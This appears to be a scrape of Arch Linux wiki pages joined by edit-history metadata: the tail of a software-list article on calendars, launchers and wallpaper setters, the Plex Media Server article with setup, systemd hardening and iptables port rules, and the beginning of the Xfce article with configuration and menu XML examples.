* {{App|khal|Command-line (non-interactive) and ncurses (interactive) calendar system (supports CalDAV)|https://github.com/pimutils/khal|{{Pkg|khal}}}}<br />
* {{App|mail2rem|Small script for importing *.ics calendars from Maildir to Remind calendar.|https://github.com/esovetkin/mail2rem|{{AUR|mail2rem-git}}}}<br />
* {{App|Pal|Very lightweight calendar with both interactive and non-interactive interfaces.|http://palcal.sourceforge.net/|{{AUR|pal}}}}<br />
* {{App|pcal|A tool to create pdf calendars from pcal input which can be exported by some calendar programs.|https://sourceforge.net/projects/pcal/|{{AUR|pcal}}}}<br />
* {{App|[[Remind]]|Highly sophisticated text-based calendaring and notification system.|http://roaringpenguin.com/products/remind|{{Pkg|remind}}}}<br />
* {{App|[[Wikipedia:Taskwarrior|Taskwarrior]]|Command-line To-do list application with support for lua customization and more.|http://taskwarrior.org/|{{Pkg|task}}}}<br />
* {{App|Todo.txt|Small command-line To-do manager.|http://ginatrapani.github.com/todo.txt-cli/|{{AUR|todotxt}}}}<br />
* {{App|todoman|Command-line To-do list manager (supports CalDAV)|https://github.com/pimutils/todoman|{{AUR|todoman}}}}<br />
* {{App|TuDu|Ncurses-based hierarchical To-do list manager with vim-like keybindings.|http://code.meskio.net/tudu/|{{AUR|tudu}}}}<br />
* {{App|When|Simple personal calendar program.|http://lightandmatter.com/when/when.html|{{Pkg|when}}}}<br />
* {{App|Wyrd|Text-based front-end to Remind, a calendar and alarm program used on UNIX and Linux computers.|http://pessimization.com/software/wyrd/|{{AUR|wyrd}}}}<br />
<br />
==== Graphical ====<br />
<br />
* {{App|Calendar|Calendar application for GNOME.|https://wiki.gnome.org/Apps/Calendar|{{Pkg|gnome-calendar}}}}<br />
* {{App|Clocks|Clocks application for GNOME, including alarm, stopwatch and timer functionality.|https://wiki.gnome.org/Apps/Clocks|{{Pkg|gnome-clocks}}}}<br />
* {{App|Day Planner|Program designed to help you easily plan and manage your time. It can manage appointments, birthdays and more.|http://www.day-planner.org/|{{AUR|dayplanner}}}}<br />
* {{App|etm (Event and Task Manager)|Simple application with a "Getting Things Done!" approach to handling events, tasks, activities, reminders and projects.|http://duke.edu/~dgraham/ETM/|{{AUR|etm}}}}<br />
* {{App|etmtk (Event and Task Manager second generation)|Simple application with a "Getting Things Done!" approach to handling events, tasks, activities, reminders and projects. A newer version of etm.|http://duke.edu/~dgraham/ETMtk/|{{AUR|etmtk}}}}<br />
* {{App|GNOME Break Timer|Keeps track of how much you are using the computer, and it reminds you to take regular breaks.|https://wiki.gnome.org/Apps/GnomeBreakTimer|{{Pkg|gnome-break-timer}}}}<br />
* {{App|Hamster|Time tracking application that helps you to keep track on how much time you have spent during the day on activities you choose to track.|http://projecthamster.org/|{{Pkg|hamster-time-tracker}}}}<br />
* {{App|[[Wikipedia:Kontact#Organizer|KOrganizer]]|Calendar and scheduling program, part of {{Grp|kdepim}}.|https://www.kde.org/applications/office/korganizer/|{{Pkg|korganizer}}}}<br />
* {{App|[[Wikipedia:Lightning (software)|Lightning]]|Extension to Mozilla Thunderbird that provides calendar and task support.|http://www.mozilla.org/projects/calendar/lightning/|{{AUR|lightning}}}}<br />
* {{App|Orage|GTK+ calendar and task manager often seen integrated with Xfce.|http://www.xfce.org/projects|{{Pkg|orage}}}}<br />
* {{App|Osmo|GTK+ personal organizer, which includes calendar, tasks manager and address book modules.|http://clayo.org/osmo/|{{Pkg|osmo}}}}<br />
* {{App|Outspline|Extensible outliner with advanced time management features, supporting events with complex recurrence schemes.|https://kynikos.github.io/outspline/|{{AUR|outspline}}}}<br />
* {{App|QTodoTxt|A cross-platform UI client for {{ic|todo.txt}} files (see [http://todotxt.com/ project's page])|https://github.com/mNantern/QTodoTxt|{{AUR|qtodotxt}} {{AUR|qtodotxt-git}}}}<br />
* {{App|Task Coach|Simple open source To-do manager to manage personal tasks and To-do lists.|http://taskcoach.org|{{AUR|taskcoach}}}}<br />
* {{App|[[Wikipedia:Tasque (software)|Tasque]]|Easy quick task management app written in C Sharp.|https://wiki.gnome.org/Apps/Tasque|{{Pkg|tasque}}}}<br />
* {{App|Tider|Lightweight time tracking application (GTK+)|http://pusto.org/en/tider/|{{AUR|tider-git}}}}<br />
* {{App|TkRemind|Sophisticated calendar and alarm program.|http://www.roaringpenguin.com/products/remind|{{Pkg|remind}}}}<br />
* {{App|[[Wikipedia:Workrave|Workrave]]|A tool to help RSI.|http://www.workrave.org/|{{Pkg|workrave}}}}<br />
<br />
=== Recipe management ===<br />
<br />
* {{App|GNOME Recipes|Recipe management application for GNOME.|https://wiki.gnome.org/Apps/Recipes|{{Pkg|gnome-recipes}}}}<br />
* {{App|Gourmet|A simple but powerful recipe-managing application.|http://thinkle.github.io/gourmet/|{{Pkg|gourmet}}}}<br />
* {{App|KRecipes|A tool designed to make organizing your personal recipes collection fast and easy.|https://www.kde.org/applications/utilities/krecipes/|{{Pkg|krecipes}}}}<br />
<br />
=== Accessibility ===<br />
<br />
See [[Accessibility]] for tips on operating the desktop and [[:Category:Accessibility]] for all available articles.<br />
<br />
==== Screen reading ====<br />
<br />
See [[Speech recognition#List of text to speech applications]].<br />
<br />
==== Speech recognition ====<br />
<br />
See [[Speech recognition#List of speech recognition applications]].<br />
<br />
=== Amateur radio ===<br />
<br />
See the main article: [[Amateur radio#Software list]].<br />
<br />
See also [[Wikipedia:List of software-defined radios]].<br />
<br />
=== Display calibration ===<br />
<br />
See the main article: [[ICC profiles]].<br />
<br />
=== Display managers ===<br />
<br />
See the main article: [[Display manager#List of display managers]].<br />
<br />
=== Command shells ===<br />
<br />
See the main article: [[Command-line shell]].<br />
<br />
See also [[Wikipedia:Comparison of command shells]].<br />
<br />
=== Terminal multiplexers ===<br />
<br />
* {{App|abduco|Tool for session attach and detach support which allows a process to run independently from its controlling terminal.|http://www.brain-dump.org/projects/abduco/|{{Pkg|abduco}}}}<br />
* {{App|[[Wikipedia:Byobu (software)|byobu]]|An GPLv3 licensed addon for tmux or screen. It requires a terminal multiplexer installed.|http://byobu.co/|{{AUR|byobu}}}}<br />
* {{App|[[dtach]]|Program that emulates the detach feature of [[screen]].|http://dtach.sourceforge.net/|{{Pkg|dtach}}}}<br />
* {{App|[[GNU Screen]]|Full-screen window manager that multiplexes a physical terminal.|https://www.gnu.org/software/screen/|{{Pkg|screen}}}}<br />
* {{App|mtm|Simple terminal multiplexer with just four commands: change focus, split, close, and screen redraw.|https://github.com/deadpixi/mtm|{{AUR|mtm-git}}}}<br />
* {{App|[[tmux]]|BSD licensed terminal multiplexer.|http://tmux.github.io/|{{Pkg|tmux}}}}<br />
<br />
=== Desktop environments ===<br />
<br />
See the main article: [[Desktop environment#List of desktop environments]].<br />
<br />
==== Window managers ====<br />
<br />
===== Console =====<br />
<br />
See also [[#Terminal multiplexers]], which offer some of the functions of window managers for the console.<br />
<br />
* {{App|dvtm|[[dwm]]-style window manager in the console.|http://brain-dump.org/projects/dvtm/|{{Pkg|dvtm}}}}<br />
* {{App|twin|Text-mode window manager.|https://sourceforge.net/projects/twin/|{{AUR|twin}}}}<br />
* {{App|Wmutils|A set of tools for X windows manipulation.|https://github.com/wmutils/core|{{AUR|wmutils-git}}}}<br />
<br />
===== Graphical =====<br />
<br />
See the main article: [[Window manager#List of window managers]].<br />
<br />
===== Composite managers =====<br />
<br />
See the main article: [[Xorg#List of composite managers]].<br />
<br />
==== Window tilers ====<br />
<br />
* {{App|PyWO|Allows you to easily organize windows on the desktop using keyboard shortcuts.|https://code.google.com/archive/p/pywo/}}<br />
* {{App|QuickTile|Lightweight standalone alternative to Compiz Grid plugin.|http://ssokolow.com/quicktile/|{{AUR|quicktile-git}}}}<br />
* {{App|wumwum|The Window Manager manager. It can turn emwh compliant window managers into a tiling window manager while retaining all initial functionalities.|http://wumwum.sourceforge.net/|{{AUR|wumwum}}}}<br />
<br />
==== Taskbars ====<br />
<br />
See also [[Wikipedia:Taskbar]].<br />
<br />
* {{App|[[Avant Window Navigator]]|Lightweight dock which sits at the bottom of the screen.|http://launchpad.net/awn|{{AUR|avant-window-navigator}}}}<br />
* {{App|[[Bmpanel]]|Lightweight, NETWM compliant panel.|https://github.com/nsf/bmpanel2|{{AUR|bmpanel2}}}}<br />
* {{App|[[Cairo-Dock]]|Highly customizable dock and launcher application.|http://www.glx-dock.org/|{{Pkg|cairo-dock}}}}<br />
* {{App|Docker|Docking application which acts as a system tray.|http://icculus.org/openbox/2/docker/|{{AUR|docker-tray}}}}<br />
* {{App|[[Wikipedia:Docky|Docky]]|Full fledged dock application that makes opening common applications and managing windows easier and quicker.|http://wiki.go-docky.com/|{{Pkg|docky}}}}<br />
* {{App|[[fbpanel]]|Lightweight, NETWM compliant desktop panel.|https://aanatoly.github.io/fbpanel/|{{AUR|fbpanel}}}}<br />
* {{App|[[Wikipedia:GNOME Panel|GNOME Panel]]|Panel included in the [[GNOME Flashback]] desktop.|https://wiki.gnome.org/Projects/GnomePanel|{{Pkg|gnome-panel}}}}<br />
* {{App|LXPanel|Lightweight X11 desktop panel and part of the LXDE desktop.|http://lxde.org/lxpanel|{{Pkg|lxpanel}}}}<br />
* {{App|MATE Panel|Panel included in the [[MATE]] desktop.|https://github.com/mate-desktop/mate-panel/|{{Pkg|mate-panel}}}}<br />
* {{App|PerlPanel|The ideal accompaniment to a light-weight Window Manager such as OpenBox, or a desktop-drawing program like iDesk.|http://savannah.nongnu.org/projects/perlpanel|{{AUR|perlpanel-git}}}}<br />
* {{app|[[Plank]]|Elegant, simple, clean dock from [[pantheon]] desktop environment.|https://launchpad.net/plank|{{pkg|plank}}}}<br />
* {{App|[[PyPanel]]|Lightweight panel/taskbar written in Python and C.|http://pypanel.sourceforge.net/|{{Pkg|pypanel}}}}<br />
* {{App|[[Stalonetray]]|Stand-alone system tray.|http://stalonetray.sourceforge.net/|{{Pkg|stalonetray}}}}<br />
* {{App|[[Tint2]]|Simple panel/taskbar developed specifically for Openbox.|https://gitlab.com/o9000/tint2|{{Pkg|tint2}}}}<br />
* {{App|Trayer|Lightweight GTK+-based systray.|https://gna.org/projects/fvwm-crystal/|{{Pkg|trayer}}}}<br />
* {{App|Vala Panel|Gtk3 panel for compositing window managers|https://github.com/rilian-la-te/vala-panel|{{AUR|vala-panel-git}}}}<br />
* {{App|Xfce Panel|Panel included in the [[Xfce]] desktop.|http://docs.xfce.org/xfce/xfce4-panel/start|{{Pkg|xfce4-panel}}}}<br />
* {{App|[[xmobar]]|A lightweight, text-based, status bar written in Haskell.|http://projects.haskell.org/xmobar/|{{Pkg|xmobar}}, {{AUR|xmobar-git}}}}<br />
<br />
==== Application launchers ====<br />
<br />
See also [[Wikipedia:Comparison of desktop application launchers]].<br />
<br />
* {{App|Albert|A sophisticated, plugin based standalone keyboard launcher.|https://github.com/manuelschneid3r/albert|{{AUR|albert}}}}<br />
* {{App|Bashrun2|Provides a different, barebones approach to a run dialog, using a specialized Bash session within a small xterm window.|http://henning-bekel.de/bashrun2/|{{AUR|bashrun2}}}}<br />
* {{App|[[dmenu]]|Fast and lightweight dynamic menu for X which is also useful as an application launcher.|https://tools.suckless.org/dmenu/|{{Pkg|dmenu}}}}<br />
* {{App|dmenu-extended|An extension to ''dmenu'' for quickly opening files and folders.|https://github.com/markjones112358/dmenu-extended|{{AUR|dmenu-extended-git}}}}<br />
* {{App|dmenu-launch|Simple ''dmenu''-based application launcher. Launches binaries and XDG shortcuts.|https://github.com/Wintervenom/Scripts/blob/master/file/launch/dmenu-launch|{{AUR|dmenu-launch}}}}<br />
* {{App|dmenu2|Fork of dmenu with many useful patches applied and additional options like screen select, dim or opacity change.|https://bitbucket.org/melek/dmenu2|{{AUR|dmenu2}}}}<br />
* {{App|dswitcher|''dmenu''-based window switcher that works regardless of workspace or minimization.|https://github.com/Antithesisx/dswitcher|{{AUR|dswitcher-git}}}}<br />
* {{App|Fehlstart|Small GTK+-based application launcher.|https://gitlab.com/fehlstart/fehlstart|{{AUR|fehlstart-git}}}}<br />
* {{App|[[Gmrun]]|Lightweight GTK+-based application launcher, with the ability to run programs inside a terminal and other handy features.|https://sourceforge.net/projects/gmrun/|{{Pkg|gmrun}}}}<br />
* {{App|[[Wikipedia:GNOME Do|GNOME Do]]|Application launcher inspired by [[Wikipedia:Quicksilver_(software)|Quicksilver]] with many plugins, originally developed for the GNOME desktop.|http://do.cooperteam.net/|{{Pkg|gnome-do}}}}<br />
* {{App|j4-dmenu-desktop|Very fast dmenu application launcher.|https://github.com/enkore/j4-dmenu-desktop|{{AUR|j4-dmenu-desktop}}}}<br />
* {{App|higgins|A desktop agnostic application launcher, file finder, calculator and more. Plugin based and freely and easily extendable via user-written plugins|https://github.com/kokoko3k/higgins|{{AUR|higgins-git}}}}<br />
* {{App|Kupfer|Convenient command and access tool for the GNOME desktop that can launch applications, open documents and access different types of objects and act on them.|https://wiki.gnome.org/Apps/Kupfer|{{Pkg|kupfer}}}}<br />
* {{App|launch|Simple command for launching applications from a terminal emulator.|https://github.com/silverhammermba/launch|{{AUR|launch-cmd}}}}<br />
* {{App|[[Wikipedia:Launchy|Launchy]]|Very popular cross-platform application launcher with a plugin-based system used to provide extra functionality.|http://www.launchy.net/|{{Pkg|launchy}}}}<br />
* {{App|Lighthouse|A simple scriptable popup dialog to run on X.|https://github.com/emgram769/lighthouse|{{AUR|lighthouse-git}}}}<br />
* {{App|[[rofi]]|A popup window switcher roughly based on superswitcher, requiring only xlib and pango.|http://davedavenport.github.io/rofi/|{{Pkg|rofi}}}}<br />
* {{app|slingshot|An application launcher has a clear look, part of [[pantheon]] desktop environment.|https://launchpad.net/slingshot|{{AUR|slingshot-launcher}}}}<br />
* {{App|Runa|Fast and light dmenu-driven desktop application launcher, suitable for use standalone, integrated into file manager context menus, or as an 'xdg-open' replacement. Favourite applications can also be configured.|http://appstogo.mcfadzean.org.uk/linux.html#runa|{{aur|runa}}}}<br />
* {{App|Synapse|Synapse is a semantic launcher written in Vala that you can use to start applications as well as find and access relevant documents and files by making use of the Zeitgeist engine.|https://launchpad.net/synapse-project|{{Pkg|synapse}}}}<br />
* {{App|Whippet|A launcher and xdg-open replacement for control freaks. Opens files and URLs with applications associated by name and/or mimetype. Applications and associations may be customized using an SQLite database. Uses dmenu to manage its menus.|http://appstogo.mcfadzean.org.uk/linux.html#whippet|{{aur|whippet}}}}<br />
* {{App|xfce4-appfinder|An eazy-to-use application launcher from Xfce.|http://docs.xfce.org/xfce/xfce4-appfinder/start|{{pkg|xfce4-appfinder}}}}<br />
<br />
==== Wallpaper setters ====<br />
<br />
See also [[Wikipedia:Wallpaper (computing)]].<br />
<br />
* {{App|bgs|An extremely fast and small background setter for X based on imlib2.|https://github.com/Gottox/bgs/|{{AUR|bgs-git}}}}<br />
* {{App|esetroot|Eterm's root background setter, packaged separately.|http://www.eterm.org/|{{AUR|esetroot}}}}<br />
* {{App|[[Feh]]|A lightweight and powerful image viewer that can also be used to manage the desktop wallpaper.|http://linuxbrit.co.uk/software/feh/|{{Pkg|feh}}}}<br />
* {{App|habak|A background changing app.|http://fvwm-crystal.sourceforge.net/|{{Pkg|habak}}}}<br />
* {{App|hsetroot|A tool to create compose wallpapers.|https://packages.debian.org/sid/hsetroot|{{AUR|hsetroot}}}}<br />
* {{App|[[Nitrogen]]|A fast and lightweight desktop background browser and setter for X windows.|http://projects.l3ib.org/nitrogen/|{{Pkg|nitrogen}}}}<br />
* {{App|pybgsetter|Multi-backend (hsetroot, Esetroot, habak, feh) to set desktop wallpaper.|<nowiki>http://bbs.archlinux.org/viewtopic.php?id=88997</nowiki>|{{AUR|pybgsetter}}}}<br />
* {{App|pywal|Changes the wallpaper and creates matching colorschemes for various applications (rofi, i3, termials)|https://github.com/dylanaraps/pywal|{{AUR|python-pywal}}}}<br />
* {{App|variety|Changes the wallpaper on a regular interval using user-specified or automatically downloaded images.|http://peterlevi.com/variety/|{{Pkg|variety}}}}<br />
* {{App|wallpaperd|A small application that takes care of setting the background image.|https://projects.pekdon.net/projects/wallpaperd|{{AUR|wallpaperd}}}}<br />
* {{App|xli|An image display program for X.|https://packages.debian.org/sid/xli|{{AUR|xli}}}}<br />
<br />
{{Tip|In order to avoid installing one more package, you may find convenient to use the {{ic|display}} utility from {{Pkg|imagemagick}} or {{ic|gm display}} from {{Pkg|graphicsmagick}}. E.g.: {{ic|display -backdrop -background '#3f3f3f' -flatten -window root ''image''}}.}}<br />
<br />
==== Virtual desktop pagers ====<br />
<br />
See also [[Wikipedia:Pager (GUI)]].<br />
<br />
* {{App|bbpager|Dockable pager for [[blackbox]] and other window managers.|3=http://bbtools.sourceforge.net/download.php?file=6|4={{Pkg|bbpager}}}}<br />
* {{App|fbpager|Virtual desktop pager for fluxbox.|http://www.fluxbox.org/fbpager|{{AUR|fbpager-git}}}}<br />
* {{App|IPager|A configurable pager with transparency, originally developed for Fluxbox.|http://useperl.ru/ipager/index.en.html|{{AUR|ipager}}}}<br />
* {{App|Neap|An non-intrusive and light pager that runs in the notification area of your panel.|https://github.com/vzxwco/neap|{{AUR|neap-hotkey}}}}<br />
* {{App|Netwmpager|A NetWM/EWMH compatible pager.|https://sourceforge.net/projects/sf-xpaint/files/netwmpager/|{{AUR|netwmpager}}}}<br />
<br />
==== Desktop widgets ====<br />
<br />
* {{App|[[Wikipedia:gDesklets|gDesklets]]|System for bringing mini programs (desklets) onto your desktop.|https://launchpad.net/gdesklets|{{Pkg|gdesklets}}}}<br />
* {{App|GPhotoFrame|Photo frame gadget for the GNOME Desktop.|https://github.com/iblis17/gphotoframe|{{AUR|gphotoframe}}}}<br />
* {{App|[[Wikipedia:Screenlets|Screenlets]]|Widget framework that consists of small owner-drawn applications.|https://launchpad.net/screenlets|{{Pkg|screenlets-pack-basic}}}}<br />
<br />
=== Dictionary and Thesaurus ===<br />
<br />
* {{App|artha|A free cross-platform English thesaurus that works completely off-line and is based on WordNet.|http://artha.sourceforge.net/wiki/index.php/Home|{{AUR|artha}}}}<br />
* {{App|sdcv|A command line dictionary. It provides access to dictionaries in StarDict's format.|https://wiki.archlinux.org/index.php/Sdcv|{{Pkg|sdcv}}}}</div>Wakehttps://wiki.archlinux.org/index.php?title=Plex&diff=511935Plex2018-02-25T00:34:36Z<p>Wake: Link to def of 10-foot</p>
<hr />
<div>[[Category:Streaming]]<br />
[[ja:Plex]]<br />
[https://www.plex.tv/ Plex] is a media player system and software suite consisting of many player applications for [https://en.wikipedia.org/wiki/10-foot_user_interface 10-foot] user interfaces and an associated media server that organizes personal media stored on local devices. Integrated Plex Channels provide users with access to a growing number of online content providers such as YouTube, Vimeo, TEDTalks, and CNN among others. Plex also provides integration for cloud services including Dropbox, Box, Google Drive, or Copy.<br />
<br />
Plex for Linux is split into a closed-source server Plex Media Server, and an open-source client Plex Home Theater, a fork of the popular [[Kodi]] project.<br />
<br />
== Plex Media Server (PMS) ==<br />
<br />
=== Installation ===<br />
<br />
Install the {{AUR|plex-media-server}} package, or the {{AUR|plex-media-server-plexpass}} package if you have a Plex Pass.<br />
<br />
=== Setup ===<br />
<br />
[[Enable]] and start {{ic|plexmediaserver.service}}.<br />
<br />
To begin configuring PMS, browse to {{ic|http://localhost:32400/web/}}.<br />
<br />
To configure PMS remotely, you must first create an SSH tunnel (setup can only be done from <code>localhost</code>)<br />
<br />
<code>ssh ip.address.of.server -L 8888:localhost:32400</code><br />
<br />
and then browse to {{ic|http://localhost:8888/web/}}.<br />
<br />
=== Plugins ===<br />
<br />
PMS can be expanded with additional plugins. For example, PMS can be used as an IPTV client with the [https://github.com/Cigaras/IPTV.bundle IPTV plugin].<br />
<br />
Plugins can be installed inside {{ic|/var/lib/plex/Plex Media Server/Plug-ins}}.<br />
<br />
=== Plex Live TV and DVR ===<br />
<br />
Plex live TV requires a plexpass.<br />
<br />
To enable live TV viewing and DVR support with plex, you must have one of the supported tuners listed on the [https://support.plex.tv/hc/en-us/articles/225877427-Supported-DVR-Tuners-and-Antennas support page] and {{AUR|plex-media-server-plexpass}} installed. PMS will automatically recognize any connected tuners.<br />
<br />
The plex user needs to be part of the video group in order to access local tuners. This can be done by running {{ic|usermod -a -G video plex}}<br />
<br />
=== Security ===<br />
<br />
It is recommended to store your media files outside of your home directory, as making it accessible to PMS would mean lowering its security. Having a separate {{ic|/media}} or {{ic|/mnt/media}} partition is a good setup for use with PMS.<br />
<br />
You can further increase security via systemd, by [[edit]]ing {{ic|plexmediaserver.service}} as follows: <br />
<br />
{{hc|/etc/systemd/system/plexmediaserver.service.d/restrict.conf|2=<br />
[Service]<br />
ReadOnlyDirectories=/<br />
ReadWriteDirectories=/var/lib/plex /tmp}}<br />
<br />
{{Note|Those mechanisms are currently limited, see [[DeveloperWiki:Security#ReadOnly/ReadWrite]]{{Broken section link}}. For instance, ReadOnlyDirectories do not apply to any submount, you have to list them as well.}}<br />
<br />
=== Resource Management ===<br />
<br />
Originally, PMS used ulimit to limit its allocated resources, however this is not compatible with running as a regular user. Instead, you can now set a maximum amount of memory via, again, systemd. For example, you can add:<br />
<br />
MemoryMax=4G<br />
<br />
to the file mentioned above.<br />
<br />
=== Network ===<br />
<br />
{{Note|PMS supports both IPv4 and IPv6. This section only assumes the use of IPv4.}}<br />
<br />
PMS and its DLNA server require several ports to be open:<br />
<br />
*Plex Media Server: TCP 32400<br />
*Plex DLNA Server: TCP 32469, UDP 1900<br />
*Network Discovery: UDP 32410, 32412, 32413, 32414<br />
*Bonjour/Avahi Network Discovery (legacy): UDP 5353<br />
<br />
A short example with iptables:<br />
<br />
# iptables -A INPUT -p tcp -m multiport --dports 32400,32469 -j ACCEPT<br />
# iptables -A INPUT -p udp -m multiport --dports 1900,32410,32412,32413,32414 -j ACCEPT<br />
<br />
In order to connect to Plex through on a standard http port, this command can be used (for port 8080):<br />
<br />
#iptables -t nat -A PREROUTING -p tcp --dport 8080 -j REDIRECT --to-port 32400<br />
<br />
Then you can connect directly to http://yourplexaddress:8080 on this port<br />
<br />
===Library Updates===<br />
Plex Media Server has a setting "Update my library automatically" which can detect new media files as they're downloaded to your library. But as your library grows, these updates might stop working reliably. To fix, you need to increase the number of files non-root users are allowed to subscribe to via inotify. Create the file {{ic|/etc/sysctl.d/40-max-user-watches.conf}}<br />
<br />
{{hc|/etc/sysctl.d/40-max-user-watches.conf|2=<br />
fs.inotify.max_user_watches=524288<br />
}}<br />
<br />
and run {{ic|sudo sysctl --system}} to apply without rebooting. Now plex should see any new files.<br />
<br />
=== Troubleshooting ===<br />
<br />
{{Expansion|1=Look if journalctl can be made equivalent with {{ic|1=SYSTEMD_LOG_LEVEL=debug}}, currently appears unreliable, see [[User talk:Alucryd#Plex]]}}<br />
<br />
Logs are located in:<br />
<br />
/var/lib/plex/Plex Media Server/Logs<br />
<br />
In case there are no logs or they are not helpful, you might want to launch PMS manually to get some terminal output:<br />
<br />
sudo -u plex /usr/bin/bash<br />
source /etc/conf.d/plexmediaserver<br />
export LD_LIBRARY_PATH=/opt/plexmediaserver<br />
/opt/plexmediaserver/Plex\ Media\ Server<br />
<br />
== Plex Home Theater (PHT) ==<br />
<br />
Previously known as Plex Media Center, Plex Home Theater is the software component used for a long time as the front-end media player for Plex's back-end server component Plex Media Server. This component came from a fork of XBMC Media Center software on May 21, 2008.<br />
<br />
Official support for Plex Home Theater (from Plex, Inc.) has been discontinued in favour of Plex Media Player (based on MPV). However, Plex Home Theater has been forked and is still under active development by the Open Source community under the name [https://github.com/RasPlex/OpenPHT OpenPHT]<br />
<br />
=== Installation ===<br />
<br />
[[Install]] the {{AUR|openpht}} package.<br />
<br />
Plex Home Theater can be launched by running {{ic|plexhometheater.sh}} from your terminal.<br />
<br />
== Plex Media Player (PMP) ==<br />
<br />
Plex Media Player is the current release of Plex's media client. It has officially replaced [[#Plex Home Theater .28PHT.29|#Plex Home Theater (PHT)]] (which is still receiving bug fixes) and builds upon previous functionality, such as using mpv. Plex has made PMP [https://www.plex.tv/blog/plex-media-player-now-ambidextrous-free-kodi-said/ available] to all users and it has also become compatible with Kodi. Keep in mind, PMP is not open-source (unlike PHT).<br />
<br />
=== Installation ===<br />
<br />
[[Install]] the {{AUR|plex-media-player}} package.<br />
<br />
== Kodi and PleXBMC ==<br />
<br />
With the PleXBMC add-on, Kodi can be used as a replacement for PHT.<br />
<br />
=== Installation ===<br />
<br />
Install the {{Pkg|kodi}} package, then follow the instructions over [http://kodi.wiki/view/Add-on:PleXBMC here].</div>Wakehttps://wiki.archlinux.org/index.php?title=Xfce&diff=470336Xfce2017-03-10T15:58:42Z<p>Wake: /* Menu */ point to info on xdg menus.</p>
<hr />
<div>[[Category:Desktop environments]]<br />
[[cs:Xfce]]<br />
[[de:Xfce]]<br />
[[es:Xfce]]<br />
[[fa:Xfce]]<br />
[[fr:Xfce]]<br />
[[it:Xfce]]<br />
[[ja:Xfce]]<br />
[[pl:Xfce]]<br />
[[ru:Xfce]]<br />
[[tr:Xfce Masaüstü Ortamı]]<br />
[[uk:Xfce]]<br />
[[zh-hans:Xfce]]<br />
[[ko:Xfce]]<br />
{{Related articles start}}<br />
{{Related|Desktop environment}}<br />
{{Related|Window manager}}<br />
{{Related|Xfwm}}<br />
{{Related|Thunar}}<br />
{{Related|LXDE}}<br />
{{Related|GNOME}}<br />
{{Related articles end}}<br />
<br />
[http://www.xfce.org Xfce] is a lightweight and modular [[Desktop environment]] currently based on GTK+ 2. To provide a complete user experience, it includes a window manager, a file manager, desktop and panel.<br />
<br />
== Installation ==<br />
<br />
[[Install]] the {{Grp|xfce4}} group. You may also wish to install the {{Grp|xfce4-goodies}} group which includes extra plugins and a number of useful utilities such as the {{Pkg|mousepad}} editor. Xfce uses the [[Xfwm]] window manager by default.<br />
<br />
== Starting Xfce ==<br />
<br />
Choose ''Xfce Session'' from the menu in a [[display manager]] of choice, or add {{ic|exec startxfce4}} to [[Xinitrc]].<br />
<br />
{{Note|Do not call the {{ic|xfce4-session}} executable directly; {{ic|startxfce4}} is the correct command which, in turn, calls the former when appropriate.}}<br />
<br />
== Configuration ==<br />
<br />
Xfce stores configuration options in [http://docs.xfce.org/xfce/xfconf/start Xfconf]. There are several ways to modify these options:<br />
<br />
* In the main menu, select [http://docs.xfce.org/xfce/xfce4-settings/start Settings] and the category you want to customize. Categories are programs usually located in {{ic|/usr/bin/xfce4-*}} and {{ic|/usr/bin/xfdesktop-settings}}.<br />
* {{ic|xfce4-settings-editor}} can see and modify all settings. Options modified here will take effect immediately. Use {{ic|xfconf-query}} to change settings from the commandline; see [http://docs.xfce.org/xfce/xfconf/xfconf-query the documentation] for details.<br />
* Settings are stored in XML files in {{ic|~/.config/xfce4/xfconf/xfce-perchannel-xml/}} which can be edited by hand. However, changes made here will ''not'' take effect immediately.<br />
<br />
=== Menu ===<br />
<br />
See [[Xdg-menu]] for more info on using the Free Desktop menu system.<br />
<br />
==== Whisker menu ====<br />
<br />
{{Pkg|xfce4-whiskermenu-plugin}} (also included in {{Grp|xfce4-goodies}}) is an alternate application launcher. It shows a list of favorites, browses through all installed applications through category buttons, and supports fuzzy searching. After package being installed, it can replace 'Applications Menu' as first item in Panel 1 (in 'Settings/Panel/Items' add 'Whisker Menu'...).<br />
<br />
==== Edit entries ====<br />
<br />
A number of graphical tools are available for this task:<br />
<br />
* {{App|XAME|GUI tool written in Gambas designed specifically for editing menu entries in Xfce, it will not work in other environments. (Discontinued)|http://www.redsquirrel87.com/XAME.php|{{AUR|xame}}}}<br />
* {{App|MenuLibre|An advanced menu editor that provides modern features in a clean, easy-to-use interface.|https://launchpad.net/menulibre|{{AUR|menulibre}}}}.<br />
* {{App|Alacarte|Menu editor for GNOME|http://www.gnome.org/|{{Pkg|alacarte}}}}<br />
<br />
Alternatively, create the file {{ic|~/.config/menus/xfce-applications.menu}} manually. See the example configuration below:<br />
<br />
<!DOCTYPE Menu PUBLIC "-//freedesktop//DTD Menu 1.0//EN"<br />
"http://www.freedesktop.org/standards/menu-spec/1.0/menu.dtd"><br />
<br />
<Menu><br />
<Name>Xfce</Name><br />
<MergeFile type="parent">/etc/xdg/menus/xfce-applications.menu</MergeFile><br />
<br />
<Exclude><br />
<Filename>xfce4-run.desktop</Filename><br />
<Filename>exo-terminal-emulator.desktop</Filename><br />
<Filename>exo-file-manager.desktop</Filename><br />
<Filename>exo-mail-reader.desktop</Filename><br />
<Filename>exo-web-browser.desktop</Filename><br />
<Filename>xfce4-about.desktop</Filename><br />
<Filename>xfhelp4.desktop</Filename><br />
</Exclude><br />
<br />
<Layout><br />
<Merge type="all"/><br />
<Separator/><br />
<Menuname>Settings</Menuname><br />
<Separator/><br />
<Filename>xfce4-session-logout.desktop</Filename><br />
</Layout><br />
</Menu><br />
<br />
The {{ic|<MergeFile>}} tag includes the default Xfce menu.<br />
<br />
The {{ic|<Exclude>}} tag excludes applications which we do not want to appear in the menu. Here we excluded some Xfce default shortcuts, but you can exclude {{ic|firefox.desktop}} or any other application.<br />
<br />
The {{ic|<Layout>}} tag defines the layout of the menu. The applications can be organized in folders or however we wish. For more details see the [http://wiki.xfce.org/howto/customize-menu Xfce wiki].<br />
<br />
You can also make changes to the Xfce menu by editing the {{ic|.desktop}} files themselves. To hide entries, see [[Desktop entries#Hide desktop entries]]. You can edit the application's category by modifying the {{ic|1=Categories=}} line of the desktop entry, see [[Desktop entries#File example]].<br />
<br />
=== Desktop ===<br />
<br />
==== Transparent background for icon titles ====<br />
<br />
To change the default white background of desktop icon titles to something more suitable, create or edit {{ic|~/.gtkrc-2.0}}:<br />
<br />
{{bc|<nowiki><br />
style "xfdesktop-icon-view" {<br />
XfdesktopIconView::label-alpha = 10<br />
base[NORMAL] = "#000000"<br />
base[SELECTED] = "#71B9FF"<br />
base[ACTIVE] = "#71B9FF"<br />
fg[NORMAL] = "#fcfcfc"<br />
